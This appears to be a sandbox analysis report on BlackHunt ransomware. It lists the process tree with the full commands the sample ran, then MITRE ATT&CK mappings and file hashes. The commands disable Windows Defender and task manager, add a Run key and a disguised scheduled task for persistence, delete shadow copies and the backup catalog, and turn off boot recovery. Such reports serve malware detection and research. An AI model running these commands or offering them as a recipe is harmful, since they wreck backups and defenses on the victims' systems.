C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1172
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1072
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4256
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1752
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3812
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3944
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:452
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:3692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3868
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1320
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:4744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3112
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe" /F2⤵PID:3960
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\4b0b70fd61e7f6d103e4bfae16e7044606a5ec64f735ab6930fde350d94df3be.exe" /F3⤵
- Creates scheduled task(s)
PID:440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:628
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1860
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1760
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3008
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3740
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:216
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1112
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2284
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:4304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2456
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1172
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2872
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:880
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5524
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:6888
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:4060
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51d9cb71d9e1f23820b03efbd03e0328d
SHA1641d4187f238be97b0ec7ee5118cab992389563c
SHA25603ec2cd3d36394fef015dc4859be797f5e6804e0b0074cd0866f5cbcba4e6ba9
SHA5126a6452d98c3d08188e71a4bb95e2bd372669a89aae3fc49b018ca51bcc917fbbe96f1443a363a1460e0ee9724e93c605f7deaecf4f5103df32c5122dfc8eec29
-
Filesize
684B
MD569d497279028eafdbdec4d198cb7b2aa
SHA1f4238dcd93455e092d72cee9d8225f6a0b8c9946
SHA256d2c7e4f3c9c811bf92b869cec483ba0c20cfedcbbc9421193a01f6e7d4711eda
SHA512e0fe273d5961d10a2c646974a3555ccf5bcd9a3acc688cf5245e902f297414a24409bc4a624fe7ab1442634fb51b1bb948b3a7ec8fa5fceaef643d0381777352
-
Filesize
12KB
MD55390e91aa8e6385e035055b2e4575258
SHA1673f3c825595fc6393901d65e179dc48e2825e6a
SHA256c4847c248f074d5420d1774f7a9bd75afb4013cbc647aa023d5f3fa3f9ebba1a
SHA51240a94f2afe7d6e7003a5da9cee0c5f531c42baebb09f5fcc46ea2ba4b9c7932cfa4fc474479c1d6694b698ca745a935ce0edddf702ec052407bd16c5ef846376